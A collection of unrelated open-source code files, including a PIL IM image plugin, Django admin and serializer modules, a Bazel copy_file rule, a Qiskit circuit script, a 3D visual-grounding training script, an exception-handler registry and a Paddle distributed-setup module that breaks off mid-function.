format_description = "IFUNC Image Memory"
_close_exclusive_fp_after_loading = False
def _open(self):
# Quick rejection: if there's not an LF among the first
# 100 bytes, this is (probably) not a text header.
if b"\n" not in self.fp.read(100):
raise SyntaxError("not an IM file")
self.fp.seek(0)
n = 0
# Default values
self.info[MODE] = "L"
self.info[SIZE] = (512, 512)
self.info[FRAMES] = 1
self.rawmode = "L"
while True:
s = self.fp.read(1)
# Some versions of IFUNC uses \n\r instead of \r\n...
if s == b"\r":
continue
if not s or s == b'\0' or s == b'\x1A':
break
# FIXME: this may read whole file if not a text file
s = s + self.fp.readline()
if len(s) > 100:
raise SyntaxError("not an IM file")
if s[-2:] == b'\r\n':
s = s[:-2]
elif s[-1:] == b'\n':
s = s[:-1]
try:
m = split.match(s)
except re.error:
raise SyntaxError("not an IM file")
if m:
k, v = m.group(1, 2)
# Don't know if this is the correct encoding,
# but a decent guess (I guess)
k = k.decode('latin-1', 'replace')
v = v.decode('latin-1', 'replace')
# Convert value as appropriate
if k in [FRAMES, SCALE, SIZE]:
v = v.replace("*", ",")
v = tuple(map(number, v.split(",")))
if len(v) == 1:
v = v[0]
elif k == MODE and v in OPEN:
v, self.rawmode = OPEN[v]
# Add to dictionary. Note that COMMENT tags are
# combined into a list of strings.
if k == COMMENT:
if k in self.info:
self.info[k].append(v)
else:
self.info[k] = [v]
else:
self.info[k] = v
if k in TAGS:
n += 1
else:
raise SyntaxError("Syntax error in IM header: " +
s.decode('ascii', 'replace'))
if not n:
raise SyntaxError("Not an IM file")
# Basic attributes
self._size = self.info[SIZE]
self.mode = self.info[MODE]
# Skip forward to start of image data
while s and s[0:1] != b'\x1A':
s = self.fp.read(1)
if not s:
raise SyntaxError("File truncated")
if LUT in self.info:
# convert lookup table to palette or lut attribute
palette = self.fp.read(768)
greyscale = 1 # greyscale palette
linear = 1 # linear greyscale palette
for i in range(256):
if palette[i] == palette[i+256] == palette[i+512]:
if i8(palette[i]) != i:
linear = 0
else:
greyscale = 0
if self.mode == "L" or self.mode == "LA":
if greyscale:
if not linear:
self.lut = [i8(c) for c in palette[:256]]
else:
if self.mode == "L":
self.mode = self.rawmode = "P"
elif self.mode == "LA":
self.mode = self.rawmode = "PA"
self.palette = ImagePalette.raw("RGB;L", palette)
elif self.mode == "RGB":
if not greyscale or not linear:
self.lut = [i8(c) for c in palette]
self.frame = 0
self.__offset = offs = self.fp.tell()
self.__fp = self.fp # FIXME: hack
if self.rawmode[:2] == "F;":
# ifunc95 formats
try:
# use bit decoder (if necessary)
bits = int(self.rawmode[2:])
if bits not in [8, 16, 32]:
self.tile = [("bit", (0, 0)+self.size, offs,
(bits, 8, 3, 0, -1))]
return
except ValueError:
pass
if self.rawmode in ["RGB;T", "RYB;T"]:
# Old LabEye/3PC files. Would be very surprised if anyone
# ever stumbled upon such a file ;-)
size = self.size[0] * self.size[1]
self.tile = [("raw", (0, 0)+self.size, offs, ("G", 0, -1)),
("raw", (0, 0)+self.size, offs+size, ("R", 0, -1)),
("raw", (0, 0)+self.size, offs+2*size, ("B", 0, -1))]
else:
# LabEye/IFUNC files
self.tile = [("raw", (0, 0)+self.size, offs,
(self.rawmode, 0, -1))]
@property
def n_frames(self):
return self.info[FRAMES]
@property
def is_animated(self):
return self.info[FRAMES] > 1
def seek(self, frame):
if not self._seek_check(frame):
return
self.frame = frame
if self.mode == "1":
bits = 1
else:
bits = 8 * len(self.mode)
size = ((self.size[0] * bits + 7) // 8) * self.size[1]
offs = self.__offset + frame * size
self.fp = self.__fp
self.tile = [("raw", (0, 0)+self.size, offs, (self.rawmode, 0, -1))]
def tell(self):
return self.frame
def _close__fp(self):
try:
self.__fp.close()
except AttributeError:
pass
finally:
self.__fp = None
#
# --------------------------------------------------------------------
# Save IM files
SAVE = {
# mode: (im type, raw mode)
"1": ("0 1", "1"),
"L": ("Greyscale", "L"),
"LA": ("LA", "LA;L"),
"P": ("Greyscale", "P"),
"PA": ("LA", "PA;L"),
"I": ("L 32S", "I;32S"),
"I;16": ("L 16", "I;16"),
"I;16L": ("L 16L", "I;16L"),
"I;16B": ("L 16B", "I;16B"),
"F": ("L 32F", "F;32F"),
"RGB": ("RGB", "RGB;L"),
"RGBA": ("RGBA", "RGBA;L"),
"RGBX": ("RGBX", "RGBX;L"),
"CMYK": ("CMYK", "CMYK;L"),
"YCbCr": ("YCC", "YCbCr;L")
}
def _save(im, fp, filename):
try:
image_type, rawmode = SAVE[im.mode]
except KeyError:
raise ValueError("Cannot save %s images as IM" % im.mode)
frames = im.encoderinfo.get("frames", 1)
fp.write(("Image type: %s image\r\n" % image_type).encode('ascii'))
if filename:
fp.write(("Name: %s\r\n" % filename).encode('ascii'))
fp.write(("Image size (x*y): %d*%d\r\n" % im.size).encode('ascii'))
fp.write(("File size (no of images): %d\r\n" % frames).encode('ascii'))
if im.mode == "P":
fp.write(b"Lut: 1\r\n")
fp.write(b"\000" * (511-fp.tell()) + b"\032")
if im.mode == "P":
fp.write(im.im.getpalette("RGB", "RGB;L")) # 768 bytes
ImageFile._save(im, fp, [("raw", (0, 0)+im.size, 0, (rawmode, 0, -1))])
#
# --------------------------------------------------------------------
# Registry
Image.register_open(ImImageFile.format, ImImageFile)
Image.register_save(ImImageFile.format, _save)
Image.register_extension(ImImageFile.format, ".im")
|
the-stack_0_12426 | from django.contrib import admin
# from django.contrib.admin import ModelAdmin
from leaflet.admin import LeafletGeoAdmin
from .models import (
RainfallEvent,
Pixel,
Gauge
)
# customize admin site info
admin.site.site_header = '3RWW API'
admin.site.site_title = '3RWW API'
admin.site.index_title = '3RWW API'
class RainfallEventAdmin(admin.ModelAdmin):
list_filter = ('start_dt', 'end_dt')
search_fields = ['start_dt', 'end_dt', 'report_label', 'event_label']
for i in [
[RainfallEvent, RainfallEventAdmin],
[Pixel, LeafletGeoAdmin],
[Gauge, LeafletGeoAdmin]
]:
admin.site.register(*i) |
the-stack_0_12427 | # Copyright 2019 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# LOCAL MODIFICATIONS:
# this has two PRs patched in:
# https://github.com/bazelbuild/bazel-skylib/pull/323
# https://github.com/bazelbuild/bazel-skylib/pull/324
"""Implementation of copy_file macro and underlying rules.
These rules copy a file or directory to another location using Bash (on Linux/macOS) or
cmd.exe (on Windows). `_copy_xfile` marks the resulting file executable,
`_copy_file` does not.
"""
# Hints for Bazel spawn strategy
_execution_requirements = {
# Copying files is entirely IO-bound and there is no point doing this work remotely.
# Also, remote-execution does not allow source directory inputs, see
# https://github.com/bazelbuild/bazel/commit/c64421bc35214f0414e4f4226cc953e8c55fa0d2
# So we must not attempt to execute remotely in that case.
"no-remote-exec": "1",
}
def _hash_file(file):
return str(hash(file.path))
# buildifier: disable=function-docstring
def copy_cmd(ctx, src, dst):
# Most Windows binaries built with MSVC use a certain argument quoting
# scheme. Bazel uses that scheme too to quote arguments. However,
# cmd.exe uses different semantics, so Bazel's quoting is wrong here.
# To fix that we write the command to a .bat file so no command line
# quoting or escaping is required.
# Put a hash of the file name into the name of the generated batch file to
# make it unique within the package, so that users can define multiple copy_file's.
bat = ctx.actions.declare_file("%s-%s-cmd.bat" % (ctx.label.name, _hash_file(src)))
# Flags are documented at
# https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/copy
# https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/robocopy
# NB: robocopy return non-zero exit codes on success so we must exit 0 after calling it
if dst.is_directory:
cmd_tmpl = "@robocopy \"{src}\" \"{dst}\" /E >NUL & @exit 0"
mnemonic = "CopyDirectory"
progress_message = "Copying directory %s" % src.path
else:
cmd_tmpl = "@copy /Y \"{src}\" \"{dst}\" >NUL"
mnemonic = "CopyFile"
progress_message = "Copying file %s" % src.path
ctx.actions.write(
output = bat,
# Do not use lib/shell.bzl's shell.quote() method, because that uses
# Bash quoting syntax, which is different from cmd.exe's syntax.
content = cmd_tmpl.format(
src = src.path.replace("/", "\\"),
dst = dst.path.replace("/", "\\"),
),
is_executable = True,
)
ctx.actions.run(
inputs = [src],
tools = [bat],
outputs = [dst],
executable = "cmd.exe",
arguments = ["/C", bat.path.replace("/", "\\")],
mnemonic = mnemonic,
progress_message = progress_message,
use_default_shell_env = True,
execution_requirements = _execution_requirements,
)
# buildifier: disable=function-docstring
def copy_bash(ctx, src, dst):
if dst.is_directory:
cmd_tmpl = "rm -rf \"$2\" && cp -rf \"$1/\" \"$2\""
mnemonic = "CopyDirectory"
progress_message = "Copying directory %s" % src.path
else:
cmd_tmpl = "cp -f \"$1\" \"$2\""
mnemonic = "CopyFile"
progress_message = "Copying file %s" % src.path
ctx.actions.run_shell(
tools = [src],
outputs = [dst],
command = cmd_tmpl,
arguments = [src.path, dst.path],
mnemonic = mnemonic,
progress_message = progress_message,
use_default_shell_env = True,
execution_requirements = _execution_requirements,
)
def _copy_file_impl(ctx):
# When creating a directory, declare that to Bazel so downstream rules
# see it as a TreeArtifact and handle correctly, e.g. for remote execution
if getattr(ctx.attr, "is_directory", False):
output = ctx.actions.declare_directory(ctx.attr.out)
else:
output = ctx.outputs.out
if ctx.attr.allow_symlink:
if output.is_directory:
fail("Cannot use both is_directory and allow_symlink")
ctx.actions.symlink(
output = output,
target_file = ctx.file.src,
is_executable = ctx.attr.is_executable,
)
elif ctx.attr.is_windows:
copy_cmd(ctx, ctx.file.src, output)
else:
copy_bash(ctx, ctx.file.src, output)
files = depset(direct = [output])
runfiles = ctx.runfiles(files = [output])
if ctx.attr.is_executable:
return [DefaultInfo(files = files, runfiles = runfiles, executable = output)]
else:
return [DefaultInfo(files = files, runfiles = runfiles)]
_ATTRS = {
"src": attr.label(mandatory = True, allow_single_file = True),
"is_windows": attr.bool(mandatory = True),
"is_executable": attr.bool(mandatory = True),
"allow_symlink": attr.bool(mandatory = True),
}
_copy_directory = rule(
implementation = _copy_file_impl,
provides = [DefaultInfo],
attrs = dict(_ATTRS, **{
"is_directory": attr.bool(default = True),
# Cannot declare out as an output here, because there's no API for declaring
# TreeArtifact outputs.
"out": attr.string(mandatory = True),
}),
)
_copy_file = rule(
implementation = _copy_file_impl,
provides = [DefaultInfo],
attrs = dict(_ATTRS, **{
"out": attr.output(mandatory = True),
}),
)
_copy_xfile = rule(
implementation = _copy_file_impl,
executable = True,
provides = [DefaultInfo],
attrs = dict(_ATTRS, **{
"out": attr.output(mandatory = True),
}),
)
def copy_file(name, src, out, is_directory = False, is_executable = False, allow_symlink = False, **kwargs):
"""Copies a file or directory to another location.
`native.genrule()` is sometimes used to copy files (often wishing to rename them). The 'copy_file' rule does this with a simpler interface than genrule.
This rule uses a Bash command on Linux/macOS/non-Windows, and a cmd.exe command on Windows (no Bash is required).
If using this rule with source directories, it is recommended that you use the
`--host_jvm_args=-DBAZEL_TRACK_SOURCE_DIRECTORIES=1` startup option so that changes
to files within source directories are detected. See
https://github.com/bazelbuild/bazel/commit/c64421bc35214f0414e4f4226cc953e8c55fa0d2
for more context.
Args:
name: Name of the rule.
src: A Label. The file or directory to make a copy of.
(Can also be the label of a rule that generates a file or directory.)
out: Path of the output file, relative to this package.
is_directory: treat the source file as a directory
Workaround for https://github.com/bazelbuild/bazel/issues/12954
is_executable: A boolean. Whether to make the output file executable. When
True, the rule's output can be executed using `bazel run` and can be
in the srcs of binary and test rules that require executable sources.
WARNING: If `allow_symlink` is True, `src` must also be executable.
allow_symlink: A boolean. Whether to allow symlinking instead of copying.
When False, the output is always a hard copy. When True, the output
*can* be a symlink, but there is no guarantee that a symlink is
created (i.e., at the time of writing, we don't create symlinks on
Windows). Set this to True if you need fast copying and your tools can
handle symlinks (which most UNIX tools can).
**kwargs: further keyword arguments, e.g. `visibility`
"""
copy_file_impl = _copy_file
if is_executable:
copy_file_impl = _copy_xfile
elif is_directory:
copy_file_impl = _copy_directory
copy_file_impl(
name = name,
src = src,
out = out,
is_windows = select({
"@bazel_tools//src/conditions:host_windows": True,
"//conditions:default": False,
}),
is_executable = is_executable,
allow_symlink = allow_symlink,
**kwargs
)
|
the-stack_0_12428 | # qubit number=4
# total number=43
import cirq
import qiskit
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2
import numpy as np
import networkx as nx
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.cx(input_qubit[0],input_qubit[3]) # number=13
prog.h(input_qubit[3]) # number=23
prog.cz(input_qubit[0],input_qubit[3]) # number=24
prog.y(input_qubit[1]) # number=37
prog.h(input_qubit[3]) # number=25
prog.x(input_qubit[3]) # number=18
prog.cx(input_qubit[0],input_qubit[3]) # number=19
prog.cx(input_qubit[0],input_qubit[3]) # number=15
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
prog.y(input_qubit[3]) # number=12
prog.h(input_qubit[0]) # number=5
oracle = build_oracle(n-1, f)
prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]])
prog.h(input_qubit[1]) # number=6
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=32
prog.h(input_qubit[0]) # number=40
prog.cz(input_qubit[3],input_qubit[0]) # number=41
prog.h(input_qubit[0]) # number=42
prog.cx(input_qubit[3],input_qubit[0]) # number=26
prog.z(input_qubit[3]) # number=27
prog.h(input_qubit[0]) # number=29
prog.cz(input_qubit[3],input_qubit[0]) # number=30
prog.h(input_qubit[0]) # number=31
prog.h(input_qubit[0]) # number=33
prog.cz(input_qubit[3],input_qubit[0]) # number=34
prog.h(input_qubit[0]) # number=35
prog.h(input_qubit[2]) # number=36
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[0]) # number=9
prog.y(input_qubit[2]) # number=10
prog.y(input_qubit[2]) # number=11
prog.y(input_qubit[2]) # number=38
prog.y(input_qubit[2]) # number=39
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
a = "111"
b = "0"
f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
prog = make_circuit(4,f)
backend = BasicAer.get_backend('qasm_simulator')
sample_shot =8000
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit3069.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.__len__(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
|
the-stack_0_12429 | from django.contrib.auth.models import User
from rest_framework import serializers
from lists.models import Todo, TodoList
class UserSerializer(serializers.ModelSerializer):
todolists = serializers.PrimaryKeyRelatedField(
many=True, queryset=TodoList.objects.all()
)
class Meta:
model = User
fields = ("id", "username", "last_login", "date_joined", "todolists")
class TodoListSerializer(serializers.ModelSerializer):
creator = serializers.ReadOnlyField(source="creator.username")
class Meta:
model = TodoList
fields = ("id", "title", "created_at", "creator", "todos")
class TodoSerializer(serializers.ModelSerializer):
creator = serializers.ReadOnlyField(source="creator.username")
class Meta:
model = Todo
fields = (
"id",
"todolist",
"description",
"created_at",
"creator",
"is_finished",
"finished_at",
)
|
the-stack_0_12430 | # ------------------------------------------------------------------------
# BEAUTY DETR
# Copyright (c) 2022 Ayush Jain & Nikolaos Gkanatsios
# Licensed under CC-BY-NC [see LICENSE for details]
# All Rights Reserved
# ------------------------------------------------------------------------
# Parts adapted from Group-Free
# Copyright (c) 2021 Ze Liu. All Rights Reserved.
# Licensed under the MIT License.
# ------------------------------------------------------------------------
"""Main script for language modulation."""
import os
import numpy as np
import torch
import torch.distributed as dist
from main_utils import parse_option, BaseTrainTester
from data.model_util_scannet import ScannetDatasetConfig
from src.joint_det_dataset import Joint3DDataset
from src.grounding_evaluator import GroundingEvaluator
from models import BeaUTyDETR
from models import APCalculator, parse_predictions, parse_groundtruths
import ipdb
st = ipdb.set_trace
class TrainTester(BaseTrainTester):
"""Train/test a language grounder."""
def __init__(self, args):
"""Initialize."""
super().__init__(args)
@staticmethod
def get_datasets(args):
"""Initialize datasets."""
dataset_dict = {} # dict to use multiple datasets
for dset in args.dataset:
dataset_dict[dset] = 1
if args.joint_det:
dataset_dict['scannet'] = 10
print('Loading datasets:', sorted(list(dataset_dict.keys())))
train_dataset = Joint3DDataset(
dataset_dict=dataset_dict,
test_dataset=args.test_dataset,
split='train' if not args.debug else 'val',
use_color=args.use_color, use_height=args.use_height,
overfit=args.debug,
data_path=args.data_root,
detect_intermediate=args.detect_intermediate,
use_multiview=args.use_multiview,
butd=args.butd,
butd_gt=args.butd_gt,
butd_cls=args.butd_cls,
augment_det=args.augment_det
)
test_dataset = Joint3DDataset(
dataset_dict=dataset_dict,
test_dataset=args.test_dataset,
split='val' if not args.eval_train else 'train',
use_color=args.use_color, use_height=args.use_height,
overfit=args.debug,
data_path=args.data_root,
detect_intermediate=args.detect_intermediate,
use_multiview=args.use_multiview,
butd=args.butd,
butd_gt=args.butd_gt,
butd_cls=args.butd_cls
)
return train_dataset, test_dataset
@staticmethod
def get_model(args):
"""Initialize the model."""
num_input_channel = int(args.use_color) * 3
if args.use_height:
num_input_channel += 1
if args.use_multiview:
num_input_channel += 128
if args.use_soft_token_loss:
num_class = 256
else:
num_class = 19
model = BeaUTyDETR(
num_class=num_class,
num_obj_class=485,
input_feature_dim=num_input_channel,
num_queries=args.num_target,
num_decoder_layers=args.num_decoder_layers,
self_position_embedding=args.self_position_embedding,
contrastive_align_loss=args.use_contrastive_align,
butd=args.butd or args.butd_gt or args.butd_cls,
pointnet_ckpt=args.pp_checkpoint,
self_attend=args.self_attend
)
return model
@staticmethod
def _get_inputs(batch_data):
return {
'point_clouds': batch_data['point_clouds'].float(),
'text': batch_data['utterances'],
"det_boxes": batch_data['all_detected_boxes'],
"det_bbox_label_mask": batch_data['all_detected_bbox_label_mask'],
"det_class_ids": batch_data['all_detected_class_ids']
}
@torch.no_grad()
def evaluate_one_epoch(self, epoch, test_loader,
model, criterion, set_criterion, args):
"""
Eval grounding after a single epoch.
Some of the args:
model: a nn.Module that returns end_points (dict)
criterion: a function that returns (loss, end_points)
"""
if args.test_dataset == 'scannet':
return self.evaluate_one_epoch_det(
epoch, test_loader, model,
criterion, set_criterion, args
)
stat_dict = {}
model.eval() # set model to eval mode (for bn and dp)
if args.num_decoder_layers > 0:
prefixes = ['last_', 'proposal_']
prefixes = ['last_']
prefixes.append('proposal_')
else:
prefixes = ['proposal_'] # only proposal
prefixes += [f'{i}head_' for i in range(args.num_decoder_layers - 1)]
evaluator = GroundingEvaluator(
only_root=True, thresholds=[0.25, 0.5],
topks=[1, 5, 10], prefixes=prefixes,
filter_non_gt_boxes=args.butd_cls
)
# Main eval branch
for batch_idx, batch_data in enumerate(test_loader):
stat_dict, end_points = self._main_eval_branch(
batch_idx, batch_data, test_loader, model, stat_dict,
criterion, set_criterion, args
)
if evaluator is not None:
for prefix in prefixes:
evaluator.evaluate(end_points, prefix)
evaluator.synchronize_between_processes()
if dist.get_rank() == 0:
if evaluator is not None:
evaluator.print_stats()
return None
@torch.no_grad()
def evaluate_one_epoch_det(self, epoch, test_loader,
model, criterion, set_criterion, args):
"""
Eval grounding after a single epoch.
Some of the args:
model: a nn.Module that returns end_points (dict)
criterion: a function that returns (loss, end_points)
"""
dataset_config = ScannetDatasetConfig(18)
# Used for AP calculation
CONFIG_DICT = {
'remove_empty_box': False, 'use_3d_nms': True,
'nms_iou': 0.25, 'use_old_type_nms': False, 'cls_nms': True,
'per_class_proposal': True, 'conf_thresh': 0.0,
'dataset_config': dataset_config,
'hungarian_loss': True
}
stat_dict = {}
model.eval() # set model to eval mode (for bn and dp)
if set_criterion is not None:
set_criterion.eval()
if args.num_decoder_layers > 0:
prefixes = ['last_', 'proposal_']
prefixes += [
f'{i}head_' for i in range(args.num_decoder_layers - 1)
]
else:
prefixes = ['proposal_'] # only proposal
prefixes = ['last_']
ap_calculator_list = [
APCalculator(iou_thresh, dataset_config.class2type)
for iou_thresh in args.ap_iou_thresholds
]
mAPs = [
[iou_thresh, {k: 0 for k in prefixes}]
for iou_thresh in args.ap_iou_thresholds
]
batch_pred_map_cls_dict = {k: [] for k in prefixes}
batch_gt_map_cls_dict = {k: [] for k in prefixes}
# Main eval branch
wordidx = np.array([
0, 0, 0, 1, 2, 3, 4, 5, 6, 7, 7, 7, 8, 9, 10, 11,
12, 13, 13, 14, 15, 16, 16, 17, 17, 18, 18
])
tokenidx = np.array([
1, 2, 3, 5, 7, 9, 11, 13, 15, 17, 18, 19, 21, 23,
25, 27, 29, 31, 32, 34, 36, 38, 39, 41, 42, 44, 45
])
for batch_idx, batch_data in enumerate(test_loader):
stat_dict, end_points = self._main_eval_branch(
batch_idx, batch_data, test_loader, model, stat_dict,
criterion, set_criterion, args
)
# contrast
proj_tokens = end_points['proj_tokens'] # (B, tokens, 64)
proj_queries = end_points['last_proj_queries'] # (B, Q, 64)
sem_scores = torch.matmul(proj_queries, proj_tokens.transpose(-1, -2))
sem_scores_ = sem_scores / 0.07 # (B, Q, tokens)
sem_scores = torch.zeros(sem_scores_.size(0), sem_scores_.size(1), 256)
sem_scores = sem_scores.to(sem_scores_.device)
sem_scores[:, :sem_scores_.size(1), :sem_scores_.size(2)] = sem_scores_
end_points['last_sem_cls_scores'] = sem_scores
# end contrast
sem_cls = torch.zeros_like(end_points['last_sem_cls_scores'])[..., :19]
for w, t in zip(wordidx, tokenidx):
sem_cls[..., w] += end_points['last_sem_cls_scores'][..., t]
end_points['last_sem_cls_scores'] = sem_cls
# Parse predictions
# for prefix in prefixes:
prefix = 'last_'
batch_pred_map_cls = parse_predictions(
end_points, CONFIG_DICT, prefix,
size_cls_agnostic=True)
batch_gt_map_cls = parse_groundtruths(
end_points, CONFIG_DICT,
size_cls_agnostic=True)
batch_pred_map_cls_dict[prefix].append(batch_pred_map_cls)
batch_gt_map_cls_dict[prefix].append(batch_gt_map_cls)
mAP = 0.0
# for prefix in prefixes:
prefix = 'last_'
for (batch_pred_map_cls, batch_gt_map_cls) in zip(
batch_pred_map_cls_dict[prefix],
batch_gt_map_cls_dict[prefix]):
for ap_calculator in ap_calculator_list:
ap_calculator.step(batch_pred_map_cls, batch_gt_map_cls)
# Evaluate average precision
for i, ap_calculator in enumerate(ap_calculator_list):
metrics_dict = ap_calculator.compute_metrics()
self.logger.info(
'=====================>'
f'{prefix} IOU THRESH: {args.ap_iou_thresholds[i]}'
'<====================='
)
for key in metrics_dict:
self.logger.info(f'{key} {metrics_dict[key]}')
if prefix == 'last_' and ap_calculator.ap_iou_thresh > 0.3:
mAP = metrics_dict['mAP']
mAPs[i][1][prefix] = metrics_dict['mAP']
ap_calculator.reset()
for mAP in mAPs:
self.logger.info(
f'IoU[{mAP[0]}]:\t'
+ ''.join([
f'{key}: {mAP[1][key]:.4f} \t'
for key in sorted(mAP[1].keys())
])
)
return None
if __name__ == '__main__':
os.environ["TOKENIZERS_PARALLELISM"] = "false"
opt = parse_option()
torch.cuda.set_device(opt.local_rank)
torch.distributed.init_process_group(backend='nccl', init_method='env://')
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
torch.backends.cudnn.deterministic = True
train_tester = TrainTester(opt)
ckpt_path = train_tester.main(opt)
|
the-stack_0_12435 | import abc
from typing import Dict
from typing import Optional
from typing import Tuple
from typing import Type
from typing import Union
from winter.core import ComponentMethod
from .throws import get_throws
NotHandled = object()
class ExceptionHandler(abc.ABC):
@abc.abstractmethod
def handle(self, exception: Exception, **kwargs): # pragma: no cover
pass
class ExceptionHandlersRegistry:
HandlersMap = Dict[Type[Exception], ExceptionHandler]
def __init__(self):
self._handlers: ExceptionHandlersRegistry.HandlersMap = {}
self._auto_handle_exceptions = set()
super().__init__()
@property
def auto_handle_exception_classes(self) -> Tuple[Type[Exception], ...]:
return tuple(self._auto_handle_exceptions)
def add_handler(
self,
exception_cls: Type[Exception],
handler_cls: Type[ExceptionHandler],
*,
auto_handle: bool = False,
):
assert exception_cls not in self._handlers
self._handlers[exception_cls] = handler_cls()
if auto_handle:
self._auto_handle_exceptions.add(exception_cls)
def get_handler(
self,
exception: Union[Type[Exception], Exception],
) -> Optional[ExceptionHandler]:
exception_type = type(exception) if isinstance(exception, Exception) else exception
for exception_cls, handler in self._handlers.items():
if issubclass(exception_type, exception_cls):
return handler
return None
class MethodExceptionsManager:
def __init__(self, method: ComponentMethod):
super().__init__()
self._method = method
self._handlers_by_exception = get_throws(self._method)
@property
def declared_exception_classes(self) -> Tuple[Type[Exception], ...]:
return tuple(self._handlers_by_exception.keys())
@property
def exception_classes(self) -> Tuple[Type[Exception], ...]:
return self.declared_exception_classes + exception_handlers_registry.auto_handle_exception_classes
def get_handler(self, exception: Union[Type[Exception], Exception]) -> Optional[ExceptionHandler]:
exception_type = type(exception) if isinstance(exception, Exception) else exception
for exception_cls, handler in self._handlers_by_exception.items():
if handler is not None and issubclass(exception_type, exception_cls):
return handler
return exception_handlers_registry.get_handler(exception)
exception_handlers_registry = ExceptionHandlersRegistry()
|
the-stack_0_12437 | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except jin compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import six
import warnings
from multiprocessing import Process # noqa: F401
from multiprocessing import Manager # noqa: F401
import time
import sys
from paddle import compat as cpt
# deprecated module import
from paddle.fluid import core
from paddle.fluid.framework import _set_expected_place
from paddle.fluid.dygraph import parallel_helper
from paddle.fluid.dygraph.parallel import ParallelEnv
from paddle.distributed.fleet.base.private_helper_function import wait_server_ready # noqa: F401
__all__ = []
ParallelStrategy = core.ParallelStrategy
# NOTE(chenweihang): Maintain a global parallel env to avoid
# initializing ParallelEnv every time and improve performance
_global_parallel_env = None
def _get_global_parallel_env():
global _global_parallel_env
if _global_parallel_env is None:
_global_parallel_env = ParallelEnv()
return _global_parallel_env
def _start_kv_server(port, http_server_d, size):
from paddle.distributed.fleet.utils.http_server import KVServer
http_server = KVServer(int(port), size=size)
http_server.start()
wait_seconds = 3
while http_server_d.get("running", False) or not http_server.should_stop():
time.sleep(wait_seconds)
http_server.stop()
def init_parallel_env():
"""
Initialize parallel training environment in dynamic graph mode.
.. note::
Now initialize both `NCCL` and `GLOO` contexts for communication.
Returns:
None
Examples:
.. code-block:: python
import paddle
import paddle.nn as nn
import paddle.optimizer as opt
import paddle.distributed as dist
class LinearNet(nn.Layer):
def __init__(self):
super(LinearNet, self).__init__()
self._linear1 = nn.Linear(10, 10)
self._linear2 = nn.Linear(10, 1)
def forward(self, x):
return self._linear2(self._linear1(x))
def train():
# 1. initialize parallel environment
dist.init_parallel_env()
# 2. create data parallel layer & optimizer
layer = LinearNet()
dp_layer = paddle.DataParallel(layer)
loss_fn = nn.MSELoss()
adam = opt.Adam(
learning_rate=0.001, parameters=dp_layer.parameters())
# 3. run layer
inputs = paddle.randn([10, 10], 'float32')
outputs = dp_layer(inputs)
labels = paddle.randn([10, 1], 'float32')
loss = loss_fn(outputs, labels)
loss.backward()
adam.step()
adam.clear_grad()
if __name__ == '__main__':
dist.spawn(train)
"""
# 0. get env & check world size
global _global_parallel_env
# when call init_parallel_env, need update `_global_parallel_env`
_global_parallel_env = ParallelEnv()
parallel_env = _global_parallel_env
# if not parallel, `init_parallel_env` do nothing
if parallel_env.world_size < 2:
warnings.warn(
"Currently not a parallel execution environment, `paddle.distributed.init_parallel_env` will not do anything."
)
return
# 1. gpu xpu check, must be gpu or xpu
if not core.is_compiled_with_cuda() and not core.is_compiled_with_xpu():
raise NotImplementedError(
"Cannot initialize parallel environment in CPU-only version, now only "
"supports initializing the GPU and XPU parallel environment. Please recompile "
"or reinstall paddle with GPU or XPU support.")
# 2. check env
def _check_var_exists(var_name):
var = os.environ.get(var_name, None)
if var is None:
raise ValueError("paddle.distributed initialize error, "
